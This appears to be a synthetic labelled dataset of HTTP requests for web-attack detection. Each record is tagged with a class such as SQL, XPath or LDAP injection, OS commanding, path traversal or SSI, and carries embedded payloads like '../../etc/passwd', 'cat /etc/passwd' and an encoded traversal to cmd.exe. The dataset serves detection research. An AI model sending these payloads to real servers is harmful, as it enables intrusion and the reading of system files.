If-Range: Mon, 30 Aug 04 16:11:58 UTC
Max-Forwards: 18
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZmhkZTp0dWV1dA==
Authorization: Basic YXRpZm46YW1uRWhtbg==
Range: 80-
Referer: http://www.ahgny6nh.biz/vdMiE/amjiv/hndOnfB/6eof0la/nssouasi.dll
TE: trailers
Trailer: Referer
User-Agent: Mozilla/1.8 (X11; U; Linux i586 2.6; jt-es; rv:3.5.7) Gecko/62834597
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9298x371
Via: 8.6 151.112.194.68
Transfer-Encoding: identity
Upgrade: ftis/8.4, aiar9w/5.5, wticg/0.0
Warning: 839 245.108.185.165 "nonbs" 
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49107
Start - Id: 49687
class: XPathInjection
GET /yVAnBHL@OIIeR44HeKR/rcso7t/LmR7p7k/huq6jHsamEJallppN9/o0adser/9Dodsce/rifPrtet/ri1oiheSis/uyUGUIhQx/_hsQ/lW3yJ7eN8UKXknh/hqBVGHh_xzgNI.jpg?sE=4542161&vttkosas=0&k61asi=begy%5Dit&grikNaaacmo=rshN%27%5D+%7C+P++%7C+%2F%2Fuser%5B+++name%2Ftext%28+++%29++++%3D+%27uq0&nSg_6=pLBhj-v4UN&ha=sosmc+loshavingc&opyRw=hXnQ_.7GbzEA&hndi=2468&etoofP=4066&ae8syeo6An=o1WmnE%40q HTTP/1.1
Host: 141.235.44.200
Connection: close
Accept: text/*;q=0.9, video/quicktime, image/*;q=0.3
Accept-Charset: iso-8859-9
Accept-Encoding: deflate;q=0.0, compress;q=0.0, deflate;q=0.7
Accept-Language: *
Cache-Control: min-fresh=42034
Client-ip: 31.16.198.186
Cookie: iyaxEzlEleAro=iej;XGqZyg-7ttelnetnS=rEn;tdz6pdiWnsta=h8EE
Cookie2: $Version="176"
Date: Mon, 12 Sep 05 20:06:32 CET
ETag: "kEZV4g66j0qldaMaD"
Expect: Aahhoh
From: earb@naiA.org
If-Modified-Since: Tue, 24 Jul 07 12:56:21 UTC
If-Unmodified-Since: Wed, 22 Nov 06 16:25:00 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 14
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: Basic amFucm86YWVOdW9l
Range: -394122
Referer: /eTvhnyz0/Tnsb.mdb
TE: trailers,chunked,trailers
Trailer: Range
User-Agent: fynatdad6a (omhNoP; a0mwPy; eEEQoBk; idrNPg)
UA-CPU: StrongARM
UA-Disp: 764,428,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5244x685
Via: 7.8 223.69.76.204
Transfer-Encoding: gzip
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49687
Start - Id: 38614
class: LdapInjection
GET /jnspli/DNCtJzboot.inib/rbBmiRXvuuwja_w/dEgutteeo6a/O9ea7ittltilsT/eqSrjLSugrX7aOW5XD6/S39DPkQEcN8/inhtsbslnamivisb2/ysse/9JFsz_.tiff?edjTuolora2=t3ec%29%28+%7C++++%28ta%3D*%29 HTTP/1.0
Host: www.mor8as.com
Connection: ner8t
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity, identity, identity, identity;q=0.5
Accept-Language: tthib-tt5ofcn;q=0.5, eEed3r-oldxg9de;q=0.8, vcte-8saife;q=0.9, mpnt5-usHicsbm;q=0.8, aryetse-nwbs;q=0.1
Cache-Control: only-if-cached
Client-ip: 54.188.209.237
Cookie: 4re5uaMJAek9u=r28..80tVOh;tu=8ur;eitrkbpt=impm1OGa;wpsdlnihvtIf1=ex-jXLoD-P-;hta=wioCpitWuaehsmn
Cookie2: $Version="445"
Date: Wed, 18 Feb 09 09:08:09 UTC
ETag: "rjVqEE3Ot2SUJebQPx"
Expect: yEraech
From: RwOaaelp@gdhst.com
If-Modified-Since: Thu, 19 Jul 07 05:18:49 UTC
If-Unmodified-Since: Sun, 19 Nov 06 15:50:15 UTC
If-Match: "CFb1gS@mVaEbPOH"
If-None-Match: "sjSn5qbZ3i5NKpNA"
If-Range: Sun, 25 Nov 07 01:46:45 CET
Max-Forwards: 4184
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: NTLM ZGk5aGVhQXRzdGRjZXlBaWd0ZXB0bzhuMG1ib3NvbnA2bG5h
Range: -348176
Referer: /Boaz/YJacIet/abn1j/uollrql/8iaeer.mdb
TE: chunked;q=0.7
Trailer: Max-Forwards
User-Agent: Mozilla/3.6 (X11; U; Open BSD i386 9.8; n3-sd; rv:1.4.7) Gecko/51294898
UA-CPU: StrongARM
UA-Disp: 7529,000,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5976x789
Via: HTTP/5.8 www.ryhi.shtml
Transfer-Encoding: identity
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 221 www.yahrm.jpeg "dsaeopr0wq2uo" "Thu, 14 Jul 05 01:23:19 CET"
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38614
Start - Id: 36546
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 11.167.62.139
Connection: close
Accept: text/html;q=0.3, video/mpeg, image/gif;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.2, gzip, deflate, gzip;q=0.4, compress
Accept-Language: rN-rttM
Cache-Control: no-store
Client-ip: 131.100.188.215
Cookie: tooie=oiepA oee$;eeo=sock_streamaeLprocessing-instruction;8aWtnc=23795883
Cookie2: $Version="7"
Date: Tue, 08 May 07 03:53:22 GMT
ETag: "qAEfzWG5X7Zdf0i"
Expect: 100-continue
From: h8IMoanr@hlhircha.ch
If-Modified-Since: Tue, 13 Apr 10 10:59:01 UTC
If-Unmodified-Since: Fri, 12 May 06 09:44:28 UTC
If-Match: *
If-None-Match: "mjNwGbHAxe-3M0DGNWp3"
If-Range: "CAXSyzgpnM7i0TN.51g"
Max-Forwards: 2
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nc=Ad95328B
Authorization: 2Sa3e 7aaa=sttdaoE
Range: -7292
Referer: http://hecpr.org/y4rbagrs.gif
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.5 (Machintosh; U; PPC Mac OS X 9.1; hl-Ar; rv:1.3.7) Gecko/74382952
UA-CPU: x86
UA-Disp: 1693,583,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 547x5195
Via: UEttL/5.3 126.235.176.241
Transfer-Encoding: identity
Upgrade: ildtt/8.0
Warning: 091 www.ihosnnr.htm "pcnttofmn" "Fri, 10 Jun 05 17:10:45 GMT"
X-Forwarded-For: 103.73.131.132
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36546
Start - Id: 46117
class: PathTransversal
PUT /anICW./yRjJinputaHQ1QyH/eTz-TDbO/geeawy29/ek1PFjbAXW1cby5x/lfowwu/pse.js? HTTP/1.1
Content-Length: 262
Content-Language: aeinyf2t
Content-Encoding: deflate
Content-Location: /enIl/icIiq/ehns/enscnle/Qaamts2.exe
Content-MD5: dHRhaWVodGV0ZWVjdzZoZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 18 Oct 04 24:48:04 CET
Last-Modified: Fri, 15 Dec 06 17:25:39 UTC
Host: www.tee5mioE.it:80
Connection: keep-alive
Accept: application/zip;q=0.4
Accept-Charset: euc-cn, macintosh
Accept-Encoding: compress;q=0.3, compress;q=0.5, deflate;q=0.2
Accept-Language: lbya-s;q=0.2, t-irUyht;q=0.1
Cache-Control: no-store
Client-ip: 95.192.8.237
Cookie: 2fjh2@U.NXs0=38;ta8I=Rse
Cookie2: $Version="429"
Date: Tue, 18 Dec 07 09:12:57 UTC
ETag: W/"oglEj-n7sDPDhMQ7ZXph"
Expect: wrwse8=toehqye;Sar7
From: sneTb@ntoa.org
If-Modified-Since: Fri, 23 Apr 10 08:33:15 GMT
If-Unmodified-Since: Wed, 18 Jun 08 08:40:35 UTC
If-Match: *
If-None-Match: *
If-Range: "5uY0AEEPzhrB.zdy.6_L"
Max-Forwards: 0082
MIME-Version: 1.2
Pragma: gett=crfald9
Proxy-Authorization: Digest response="6Fc4B396Af2dDfCeC4Bddd49fBB1bA5c"
Authorization: Digest algorithm=MD5-sess
Range: -03018,-4474
Referer: http://ToHee.cz/9r1oaeru/Rh8yec/tsiyoeaa/tmlmrN3n/6llm.cfm
TE: gzip;q=0.8,chunked,trailers
Trailer: From
User-Agent: tyatEt1tn/0.7.2.7.5
UA-CPU: MIPS
UA-Disp: 013,8329,8
UA-Color: color16
UA-Pixels: 744x629
Via: 1.9 21.20.191.145, 1.8 www.plef.jpeg, 5.0 www.sni2.jpeg:59774
Transfer-Encoding: deflate
Upgrade: cRpj/3.7
Warning: 748 128.223.205.211 "rct2raef1cbRxNsh" "Tue, 05 Dec 06 11:57:17 CET"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Tfmbieee=huopentdtelnett&kcsT=\.\.\/\.\.\/etc\/passwd&fn6ulrs=7 0a<&msci= ioq &awasv6B=37&threiSw=lM1TXhIOgiX&mOuosoreeuse=oi+di\mbandIy4&r6gO91BS_9F=Ahceni4iaN8c9tt&uwou=rnhn3yLnrkly2eeL&yq=64923939&us5aTete=nI_IyvHA.qp&ezezib=1homeuus

End - Id: 46117
Start - Id: 35855
class: XPathInjection
GET /SYBX@4perlvar/nsjaoF9l.asmx?iigpomnhfors=6368&eoNcii=aintlhiTeusiae2dm&sa=nrmp&onor0uEyoasEf=l%3Euhw2&sVmR=9lcaw%2F0hhy%2F8%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D19%5D+++%7C+++++nLb4r%2F49s%2FAahta%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D0%5D+++or++%27locoHob%27+%3D+++%27&ss8lot3e63=a0 HTTP/1.1
Host: www.3nneaI.fr:80
Connection: keep-alive
Accept: video/*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ez-eonyne;q=0.8, elcns-uekstry;q=0.1, o-tncqHh
Cache-Control: 0toot='srcns1t'
Client-ip: 166.9.40.74
Cookie: gajha6ot=7rt|v;O9y7whQe=3038;htnhpt3i=tTJy7mJ3;dDh7tcssnji=jdDhu242yT;ae5wcscom=as;2HZwhere5divK20=nDLcSC3
Cookie2: $Version="5"
Date: Fri, 23 Feb 07 24:27:31 CET
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: 100-continue
From: dtisuok@sicpmn.gov
If-Modified-Since: Mon, 19 Oct 09 08:26:54 GMT
If-Unmodified-Since: Fri, 21 Dec 07 24:33:04 CET
If-Match: "75ogcdEg1tIwP2ZdWlK7"
If-None-Match: *
If-Range: "i5r.5H0aAAf-6ivyEc"
Max-Forwards: 55
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic MGFnc01zaWk6cDlzaW4=
Authorization: Basic aXNuZXN1bG86aElpY25PZmk=
Range: -15
Referer: /aeed/ueetrii/lrt5Ax/SayTuabs/ebeo6ce.js
TE: trailers
Trailer: Range
User-Agent: nhwFsE_tIl http://www.wcina.cz
UA-CPU: PowerPC
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4135x5853
Via: FTP/4.0 239.72.167.164:82, HTTP/8.7 www.3asH.css, FTP/7.5 119.223.249.201
Transfer-Encoding: gzip
Upgrade: ei2y/3.0
Warning: 610 www.24teifwn.png "Opivct0gaEd" 
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35855
Start - Id: 48600
class: XPathInjection
POST /lo/hhalNE/6c/-9CbYohyKgH9j/ooobo/k.vepulglink75WP.msf? HTTP/1.1
Content-Length: 192
Content-Language: tle7,navng
Content-Encoding: identity
Content-Location: /xbRctstm/tdrn5/Tnrate.htm
Content-MD5: bGlwb21sc2tlb2NlMndhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 May 08 16:32:54 GMT
Last-Modified: Thu, 24 Feb 05 04:51:40 GMT
Host: www.raSiRqWx1h.org
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 8hlEae0-emtu;q=0.8, dn9-nacanepk;q=0.6, 3eT0un-l9rt;q=0.1, t3tr-l4B
Cache-Control: td3o9ga=zomenoo
Client-ip: 58.151.109.14
Cookie: 2ftpoptwX=htpasslog$Nqb?s8;noNrgle=0drRdRzU3Sv1
Cookie2: $Version="357"
Date: Mon, 15 Jan 07 17:09:43 UTC
ETag: W/"8nwUpGX1@vrk.uB0bqTM"
Expect: 100-continue
From: LhY2ychA@lseaat.st
If-Modified-Since: Sun, 02 May 10 03:46:53 UTC
If-Unmodified-Since: Wed, 18 Jun 08 09:43:40 GMT
If-Match: "jo1mhpg7jw_lxJLXJK4"
If-None-Match: "iWTwWoQsVMvsBqR3"
If-Range: "eK7x7COBp1sq9sCZ"
Max-Forwards: 3051
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM bWFlaW9vdWJyb2ZsSXRzWXVtVGJ2ZVhzeXB0dWlpc29zVXlCbGNhbnJtc2dsd3JB
Authorization: 4diei hihre=ede5gO5
Range: 39-76,5-4266
Referer: http://Osa4.it/k7dieg3a/neale0is/hntgri/thooteio/cnca.exe
TE: deflate;q=0.4
Trailer: Authorization
User-Agent: vdeeOSeTl/6.1
UA-CPU: Sparc
UA-Disp: 5404,3137,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 853x5228
Via: 8.9 www.4fItt.css, sAtsno/0.6 www.tSy5m2.shtml:516
Transfer-Encoding: ssflt; sTismql=sxtoa
Upgrade: nosb/0.4, m6epm/3.8, n3lo/2.7
Warning: 711 www.2azi1lut.css "nhuTpph3osOgtutn" "Sun, 02 Nov 08 07:06:07 CET"
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 4557952
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

UAwgxILiZ=emteteh' or   1<     7o/n9n/2lqs/child::text()[position()=527]   or  'dr6'  =  '&K4ll5UrtcmiAt=p1JfY&aftsndeufaenlas=es?qe&tleIlknihhhinRy=UaUct

End - Id: 48600
Start - Id: 49608
class: XPathInjection
GET /uo2/thssMmfnoparclnene1/mRHpuwHW.png?mn7Tob=%3EsT+%2BH&asUmgmt=s%2F3lib%25ni&Aea=Yszel&o0duL0Z=19883885&bhwwstmiIAs=epa6o&Ig8a=841&56eg=l&rhaabtoaePtrfm=ewbaInn&ontqsceSmhd=wSlo%2F9smi%2FavN%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D4%5D++++%7C+++++pr%2FIm%2Fe%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D71%5D+++or+++++%27mlrEpx%27++%3D+%27&abhtsrldperuh8g=rhrRmcitd&ne9t6daDahsrr3l=on&icssnss5hd=uwaF HTTP/1.1
Host: 157.122.48.159
Connection: mFfv0
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 126.206.123.83
Cookie: telnetOZx='aite;Q@Kg=76;oyj-mSy9POu=nhlseNn'iHutao
Cookie2: $Version="4"
Date: Wed, 01 Sep 04 11:53:00 CET
ETag: "dDzynAdXBl83z7Mz"
Expect: brurn5=ihIa
From: b3Tsmet@oiiienq.de
If-Modified-Since: Sun, 30 Oct 05 08:16:36 GMT
If-Unmodified-Since: Mon, 25 Aug 08 17:06:42 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 05 Oct 04 05:56:11 UTC
Max-Forwards: 14
MIME-Version: 9.4
Pragma: x=e6
Proxy-Authorization: Hsia5 4xaft=eores4
Authorization: Basic Z29lbzp0dGVsaQ==
Range: 7852-
Referer: /qe9td.php4
TE: chunked,trailers,deflate
Trailer: Range
User-Agent: 6.XLWY2ni http://www.uataa.net
UA-CPU: Sparc
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 6.4 20.250.59.5, FTP/4.0 197.240.162.53
Transfer-Encoding: tbsn
Upgrade: add/2.5
Warning: 885 www.nan6nedo.jpeg "UhOln0iubuetrq" 
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49608
Start - Id: 40908
class: SSI
GET /ioa9YNBS-3Ol/PxFninputX0jopenVRknetcatHD/i22binboot.iniUDJ/r5aeinmP8Into/nehAhsaheyjtEeO/ZwwZ5hnm11LJgYaccept/ngwlnStg/ntsdnEaaai0i1ei/6fcIyos2pp/qtfect5e.jpg?c9mSii9egsnee=%3C%21--+%23odbc++++statement++%3D++%22select++osceo%2C+++++erBjd%2C+mne+from+++++N8ryuis++++order+++by+++++5%2C++168%2C++++1%22+--%3E&KBY47GEG_3=tmiife&earntopmeo=79790&QItmp95RsEaZinsert=vacenz+qgttnnd&eicua4neUsdocrt=sgFiJl6FX&dnavuslw=tscriptlta&Ib0X5scriptU3o96=c%40E HTTP/1.0
Host: www.gekak.cz:1164
Connection: ainN
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=07
Client-ip: 176.215.222.66
Cookie: athh=t eetapasswde
Date: Wed, 03 Mar 10 02:07:14 UTC
From: 7tnz7e@rrkue5aod.it
If-Unmodified-Since: Mon, 15 Aug 05 10:20:08 UTC
If-Match: *
If-None-Match: "XstJE9ZCTYnVm_eI"
If-Range: *
Max-Forwards: 479
MIME-Version: 0.0
Pragma: 6='vhs1e3q'
Authorization: Basic eGl1ZTJXaXQ6b2VzZTY=
Range: -813,4-49,-414621
Referer: /psdae.asmx
TE: trailers
User-Agent: em5h/4.4.0.6.0
UA-CPU: MIPS
UA-OS: FreeBSD
Via: 1.2 47.99.96.229
Transfer-Encoding: 8ftqr; t31Y6su=9nrsrhy
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Serial-Number: 163741114628927
----: ------------------

null

End - Id: 40908
Start - Id: 45144
class: PathTransversal
GET ////? HTTP/1.1
Host: www.1ve4idenrm.ch
Connection: enai
Accept: */*
Accept-Charset: x-mac-korean
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 231.243.192.196
Cookie: f6na1hsEsC=0411822;gid3rli5=wo
Cookie2: $Version="158"
Date: Tue, 13 Sep 05 21:15:22 GMT
ETag: "0wSFCQ37o04lOpEZWe"
Expect: sIseObpe
From: swItt@yOenslihWe.de
If-Modified-Since: Thu, 09 Mar 06 06:29:40 CET
If-Unmodified-Since: Fri, 18 Jul 08 15:09:24 CET
If-Match: "wYDgoW2IEMcFWQ5Yn"
If-None-Match: *
If-Range: "0gcNNxmEKdNOKPe"
Max-Forwards: 832
Pragma: let2kH=rm0v
Proxy-Authorization: Basic aHRheTpyaWlo
Authorization: NTLM ZTl5ZWluaGJpdHI4ZXMwdG5keXRlYWF0dHRvNWVld25sZHozbA==
Referer: http://owicpy.cz/daEx/hesu/rHt3.php4
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/0.2 (Windows; U; WinNT 6.0; hk-ag; rv:9.6.4) Gecko/13532456
Via: HTTP/3.4 www.udeee.js, 3.0 www.eartphlt.html:68511
Upgrade: rihnni/3.3, qrt5E/4.2, tei5h/7.5, aev/2.9
X-Forwarded-For: 189.98.19.155
----: ----------------------------

null

End - Id: 45144
Start - Id: 37588
class: LdapInjection
PUT /4i2jsnf/t5VKD4q2idal/ite/o6iIscie/2rqr4dpVNnLpf/ah@aQRkT/F3hfaOogxIsk5P/oFdbKUqiTU-Cdpqh/adlG/e_C.shtml? HTTP/1.1
Content-Length: 109
Content-Language: eesr64
Content-Encoding: compress
Content-Location: http://mrlalw.it/oipe/ilMa/Ittn.fgf
Content-MD5: ZWNlaWZzbGJ0YW5oNGVubA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Sep 08 05:42:35 GMT
Last-Modified: Fri, 20 Aug 04 11:52:40 CET
Host: 1.44.232.119
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tc1bNa-el;q=0.6, v-h, imebIs0-r, 0ipebHo-vaqOEi8h
Cache-Control: no-transform
Client-ip: 229.175.84.16
Cookie: V@K@4RE.H=8ZF
Cookie2: $Version="987"
Date: Wed, 01 Oct 08 17:24:27 UTC
ETag: "x34wEEW@iZls-VVU"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sat, 04 Feb 06 09:02:08 UTC
If-Unmodified-Since: Wed, 09 Feb 05 11:03:02 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 17 Dec 06 12:50:19 UTC
Max-Forwards: 538
MIME-Version: 7.0
Pragma: E='e'
Proxy-Authorization: NTLM aTZvdWFhYXRpUjU2T2xTZW9lbnRudHdsbm9YbjRlbnJuYg==
Authorization: NTLM aXRvYXBhbnVvbFdadnBhb29zaWVscnN0dGh1dHI1bW5hYW50bGVDZXd1YWU=
Range: 9-357
Referer: /owdc3/ejro8Un/eieeD7e/rinhkr0.dll
TE: deflate;q=0.6,chunked
Trailer: TE
User-Agent: eS6te0o (sk.Bk1)
UA-CPU: PowerPC
UA-Disp: 1243,740,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4454x553
Via: roimfh/2.1 199.29.172.128:4
Transfer-Encoding: thOnO; eiesst=asEWsrrd
Upgrade: lmthto/9.1, rbSto/3.8, oyEEi/6.7, 5nz/4.8
Warning: 869 0.21.109.21 "ed5fnOh" "Tue, 30 Jan 07 20:44:43 UTC"
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bevUopt=\Rw6inbk&raeAtdd=200)(&(objectClass=o7og)(|(sn   =    sag)(cn=ce J*))

End - Id: 37588
Start - Id: 40819
class: SSI
GET /pxa/mAhwWoje/nnanaie1/KstyletzMjCzmH@/0clcar9dh/ht/laM-ajJgf/uo47xtYnCM5RaFLUUpp/srIott94rbd9wunonix/r90QZzb1H/wAGhttp/ttehutjpxtifhsduhc.swf?qxe=09238342&hinuenOhnd=ltob%7CnhD%5D&snii=%3C%21--+++%23odbc+++statement+%3D++++%22select++nz%2C+++tthmaIeb%2C++++atw+from++++fdamt++++order+++++by+7%2C+116%2C+3%22++--%3E&sshmeh9a4=b%28sSf%27c%2F&6etmna95pleu=aihi&Qbn2Ywperlb=A%3E-v&Q3H-yf-q=9eLite%25%5D HTTP/1.1
Host: www.e1Ia.biz
Connection: keep-alive
Accept: audio/x-wav;q=0.6, audio/basic, text/*;q=0.0
Accept-Charset: hz-gb-2312, utf-8;q=0.6
Accept-Encoding: 
Accept-Language: Z-bb, ooeog-hdptc, mtrmTie-dsa;q=0.5, aedhelau-ueTdt
Cache-Control: max-age=67524
Client-ip: 70.114.129.131
Cookie: gWdtNteOmmsne4U=if2onoan;ihgeedrwoau=$8union$kt];gjs
Cookie2: $Version="9"
Date: Mon, 10 May 04 18:29:19 UTC
ETag: W/"whybu@XGd8ZnOdij9"
Expect: 100-continue
From: kpa1hln@eotgi.biz
If-Modified-Since: Tue, 10 Feb 04 18:25:50 CET
If-Unmodified-Since: Sat, 12 Mar 05 02:41:44 CET
If-Match: "cDnudOb4RAJjbEyd"
If-None-Match: "bFwIfFTc_tTg-Gte-pq"
If-Range: Sat, 10 Mar 07 12:00:02 GMT
Max-Forwards: 2733
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: on4ahi jgjs0nph=any1zdr
Authorization: hMq3ja fer7eoa4=hAawgd
Range: 90-,846222-
Referer: /mrte/tfqtoyrl/iknMiho8/jcSh.swf
TE: trailers,trailers,chunked
Trailer: Trailer
User-Agent: ee3e (eYY@7AD; oOtHr6; wenHth)
UA-CPU: x86
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 047x242
Via: FTP/1.5 www.r9isen.htm, pNdrtb/8.3 156.229.44.85
Transfer-Encoding: identity
Upgrade: ettl/6.5, lde51/5.6, 3reeW/7.5, btaoeh/0.0, eaI83/3.5
Warning: 540 www.po8V.png "hmamwrzrbsooT4ssuu1y" "Sun, 05 Dec 04 12:09:33 CET"
X-Serial-Number: 623411
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40819
Start - Id: 42993
class: OsCommanding
GET /ewsniou/9nx7orp3mtaaj/catUZ.nc2NoXUnOB/taoe/gLgp6T/lr9t0s9/Esm201atws/hu@I4r2Vy.jpg?io=iH.&5o1taoetn1ercre=1144&9annnnursi=Ekhztooeti&iaelBtotylsrti=53&zAtwherez8EM=yjUB8KUjqC&ltq1errcr9m=tEaeehkx2sAn&eewine=74728226&ieO=%26IIga HTTP/1.1
Host: www.aeNhthoTa.st
Connection: keep-alive
Accept: text/*, application/*;q=0.4
Accept-Charset: iso-8859-1, windows-1254;q=0.0
Accept-Encoding: deflate;q=0.9, gzip, identity;q=0.3, identity
Accept-Language: lltnlrr-hlom, 8mitisle-a;q=0.4, eaaheu-t0ii1dj;q=0.1, ec-im;q=0.4, atn1n-lds
Cache-Control: reetaot3='iv25'
Cookie: me=09265;saiegbahC4a=|     cat  /etc/passwd|;9eTiBfra=7;tg9isSh5Ss=1;scedbsishotsnr=cjbP;riaeA=3
Date: Sat, 25 Sep 04 24:30:35 UTC
ETag: "egUVc40uM78yT6E"
If-Unmodified-Since: Wed, 16 Apr 08 06:22:04 UTC
If-Match: *
If-None-Match: *
If-Range: "3lgEYM10gNLIBu-"
Max-Forwards: 4444
Pragma: eila4t=4atwy
Referer: http://www.geni.biz/shxkC/wbsn/yiSs8X.conf
User-Agent: iu@KVp1 http://www.hsesse9n.biz
Via: FTP/2.8 170.203.14.158, 8.3 www.5n3c.htm
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42993
Start - Id: 41781
class: SqlInjection
GET /rgXTR-Jvq/tn.tiff?t9xNwamrns=hatesthi%26ba%2Fhtpassela+hn&totha2crer=r0d3eths7%24bnuNvse&niNyIakeaj0st=++++OR+++++2+%3E++1 HTTP/1.1
Host: 106.28.44.254:80
Connection: ln4sl
Accept: audio/x-wav, text/*, text/plain;q=0.2
Accept-Charset: x-mac-korean, ks_c_5601-1987, windows-1253
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=2
Client-ip: 19.38.3.115
Cookie: sc9urnt9bovwua=Elisshadropzdt;skd7jstcrkto=nCWjeno9I6WX;Sshutdownthavingh3l=u1G9hp
Cookie2: $Version="3"
Date: Sun, 13 Apr 08 20:36:31 CET
ETag: ".4g273Gu0e1YegQr"
Expect: oT8d=iIlx;zinlIOcf
From: rhuEDm@qpruheT.de
If-Modified-Since: Mon, 25 Apr 05 05:39:38 CET
If-Unmodified-Since: Tue, 09 Jan 07 19:43:26 UTC
If-Match: *
If-None-Match: "OGYQBOHGVybBWsl_C"
If-Range: *
Max-Forwards: 692
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ayrepssY"
Authorization: xioe0i emhA=efh6etg
Range: 4745-5836
Referer: /scnut/reirlcu/ex2t/auaZ/antwit.jpg
TE: trailers,deflate,trailers
Trailer: Upgrade
User-Agent: Mozilla/0.2 (compatible; bhnEbjDo; Unix; Iesenh; eilhd1h; r57lhotfte)
UA-CPU: x86
UA-Disp: 079,3300,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5624x146
Via: FTP/0.2 www.osSmVsq.shtml, FTP/3.8 14.32.230.83, 5.7 www.u6HueL.gif
Transfer-Encoding: identity
Upgrade: ped/5.7, utiwa/4.3, NDinca/1.6, HleG/8.5, 6ot/6.6
Warning: 899 www.hlrs.js:0974 "osaznrsham4kiehae5n" "Mon, 18 Jul 05 24:25:09 CET"
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 79451842006720281
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41781
Start - Id: 48374
class: XPathInjection
